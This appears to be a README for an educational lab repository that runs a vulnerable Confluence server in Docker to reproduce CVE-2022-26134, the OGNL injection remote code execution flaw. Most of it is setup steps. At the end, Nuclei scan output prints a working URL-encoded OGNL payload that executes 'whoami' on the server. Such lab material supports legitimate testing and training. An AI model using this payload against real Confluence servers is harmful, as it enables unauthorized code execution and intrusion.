Confluence Server and Confluence Data Center include a significant unauthenticated remote code execution vulnerability identified as CVE-2022-26134, according to a security advisory released by Atlassian on June 2, 2022. The vulnerability was unpatched when it was published on June 2 and was being exploited in the wild. As of June 3, both patches and a temporary workaround are available.
This repository is only intended for experimental and educational purposes.
Running the vulnerable environment
docker-compose up
Once started you can access the confluence server using the following URL address
- The first time visiting the site you will be taken through setup.
- Don't check any boxes and select "Next" on the "Get apps" page.
- On the license key page click the link that says "Get an evaluation license"
- You will be redirected to my.atlassian.com. Make sure the license type selected is Confluence (Data Center). Type in whatever Organization name you like. Ensure the radio button for "Your instance is" selected is "up and running". Once you verified these details click the button "Generate License".
- A confirmation modal will pop up asking if you want to install it on the server: 127.0.0.1. Select "Yes"
- Selecting yes will automatically fill in the license key on your local instance of confluence. Select "Next"
- Choose "Standalone" deployment type and select "Next"
- On page for setting up your database the details should be filled in as follows:
- Database type: PostgreSQL
- Setup type: Simple
- Hostname: db
- Port: 5432
- Database name: confluence
- Username: confluence
- Password: 123456789
- After filling in these fields press the "Test connection" button. You should receive the message "Success! Database connected successfully". Then click "Next".
- It will begin to setting your database. This can take a little while. hang tight.
- Once the database setup is complete you will be on the "Load Content" page. Select the "Example Site" button.
- Next on the "Configure User Management" page select "Manage users and groups with Confluence".
- Next on the "Configure System Administrator Account" page create and account and select "Next".
- Once completed you will see the the setup was successful. Press "Start".
- It will ask you to "Create a space to store your work". Input any Space name you'd like.
- Skip the tutorial
- You've now completed the evaluation setup of Confluence Server.
The vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. “BALH”).
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Run the following Nuclei command:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yamlScan Output
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]